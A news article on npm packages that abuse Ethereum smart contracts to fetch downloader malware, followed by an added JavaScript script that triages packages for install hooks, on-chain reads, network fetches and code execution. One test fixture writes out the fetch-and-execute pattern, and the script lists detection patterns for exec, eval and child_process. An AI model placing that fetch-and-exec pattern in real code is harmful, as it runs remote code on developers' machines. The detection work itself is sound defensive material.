Hackers are increasingly targeting widely used Node Package Manager (NPM) libraries to plant malware that abuses Ethereum smart contracts, according to recent research by cryptocurrency compliance firm ReversingLabs. In a blog post on September 3, researcher Lucija Valentić highlighted the discovery of new forms of malware, notably the packages “colortoolsv2” and “mimelib2.” These packages, released in July 2025, exploit smart contracts, embedding harmful commands designed to install downloader malware on compromised systems.
The attack vectors are part of a growing trend where malicious supply chain actors leverage sophisticated social engineering techniques to persuade developers into incorporating harmful code into their projects. Reversing Labs noted that 2025 has seen a diverse array of campaigns targeting NPM, the primary online repository for JavaScript packages. For instance, in March, they documented the emergence of packages labeled ethers-provider2 and ethers-providerz, which are part of a larger cluster of infostealers and other malicious tools identified on NPM.
In July, researcher Karlo Zanki uncovered a campaign built around a simple package that used blockchain functionality in a novel way to fetch its malicious second stage. One significant finding was the colortoolsv2 package, which abuses Ethereum smart contracts. This seemingly simple NPM package conceals a hidden malicious payload within a script named index.js. Upon installation, the script reads data from the blockchain, connects to a command-and-control (C2) server and executes the harmful commands it receives, ultimately downloading additional malicious software.
What makes this method particularly concerning is the unusual use of Ethereum smart contracts to host the actual URLs for downloading this second-stage malware. Researchers have pointed out that they haven’t encountered such a tactic previously.
In a striking example, the researchers discovered a version of a Solana trading bot infected by the colortoolsv2 package, which appeared legitimate on the surface. The repository showcased thousands of commits, numerous contributors, and a significant volume of user engagement, all characteristics that would typically signal a trustworthy open-source project. However, these details were fabricated, and any developer installing the bot risked having their wallets drained.
The rise of software supply chain attacks on smart contracts and blockchain infrastructure has been alarming. In July, a vulnerability in Arcadia Finance’s Rebalancer contract allowed hackers to drain approximately $2.5 million in cryptocurrency from the platform operating on the Base blockchain. By manipulating arbitrary parameters for swaps, the attackers executed unauthorized transactions that emptied user vaults.
Blockchain analytics firm Global Ledger revealed a staggering statistic: hackers have stolen an estimated $3 billion worth of cryptocurrency across 119 separate incidents in the first half of 2025 alone, marking a 150% increase over the total thefts recorded in all of 2024. Slava Demchuk, CEO of analytics firm AMLBot, emphasized that access-control flaws and vulnerabilities in smart contracts, particularly in bridges, have become frequent targets for exploitation.
As the situation intensifies, blockchain auditors recommend that developers rigorously assess each library before integrating it into their projects to mitigate potential threats effectively. This heightened scrutiny is essential in the evolving landscape of decentralized finance (DeFi), where interconnected protocols amplify the risk of security breaches.
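As an added example of the kind of pre-install check the auditors recommend (this is not ReversingLabs' code or any real scanner), the script below triages an npm package by the two traits the colortoolsv2 write-up describes: an install-time lifecycle hook, and an entry script that reads on-chain data and then either downloads from the network or executes commands. The package names and sources are constructed for the demo, and `triagePackage` and its pattern lists are hypothetical helpers.

```javascript
// Added example, not ReversingLabs' code: heuristic triage of an npm package
// before it is installed, based on the traits described in the article.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const CHAIN = [/\bethers\b/, /\bweb3\b/, /JsonRpcProvider/, /eth_call/];
const EXEC = [/child_process/, /\bexec(?:Sync)?\s*\(/, /\bspawn\s*\(/, /\beval\s*\(/, /new Function\s*\(/];
const NET = [/\bfetch\s*\(/, /\bhttps?\.get\s*\(/, /\baxios\b/];

// pkgJson: the parsed package.json; entrySource: text of the file named in its "main" field.
function triagePackage(pkgJson, entrySource) {
  const reasons = [];
  const scripts = pkgJson.scripts || {};
  const hooks = INSTALL_HOOKS.filter((h) => Object.prototype.hasOwnProperty.call(scripts, h));
  if (hooks.length) reasons.push(`runs lifecycle hook(s) at install time: ${hooks.join(', ')}`);
  const any = (res) => res.some((re) => re.test(entrySource));
  const chain = any(CHAIN), exec = any(EXEC), net = any(NET);
  if (chain && net) reasons.push('reads on-chain data and then fetches from the network');
  if (chain && exec) reasons.push('reads on-chain data and spawns a process or evals code');
  if (hooks.length && exec) reasons.push('spawns a process or evals code from an install hook');
  // Two or more independent signals: hold the package for manual review.
  return { score: reasons.length, flagged: reasons.length >= 2, reasons };
}

// Constructed samples (hypothetical package names and sources, not real npm packages).
// A trading bot that legitimately talks to a node and a price API: one signal only.
const BENIGN_BOT = {
  pkg: { name: 'example-dex-bot', main: 'index.js', scripts: { test: 'node test.js' } },
  src: "const { JsonRpcProvider } = require('ethers');\n" +
       "const p = new JsonRpcProvider(RPC_URL);\n" +
       "fetch(PRICE_API).then(r => r.json()).then(trade);\n",
};
// The pattern described in the article: postinstall hook, contract read, download, execute.
const SUSPECT = {
  pkg: { name: 'example-colortools', main: 'index.js', scripts: { postinstall: 'node index.js' } },
  src: "const { JsonRpcProvider, Contract } = require('ethers');\n" +
       "const { exec } = require('child_process');\n" +
       "const c = new Contract(ADDR, ABI, new JsonRpcProvider(RPC_URL));\n" +
       "c.getString().then(u => fetch(u)).then(r => r.text()).then(s => exec(s));\n",
};

function triageSamples() {
  return {
    benign: triagePackage(BENIGN_BOT.pkg, BENIGN_BOT.src),
    suspect: triagePackage(SUSPECT.pkg, SUSPECT.src),
  };
}

console.log(JSON.stringify(triageSamples(), null, 2));
```

Wire `triagePackage` into a CI step that reads each newly added dependency's package.json and entry file from the lockfile-resolved tarball, and treat a `flagged` result as a block pending review.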

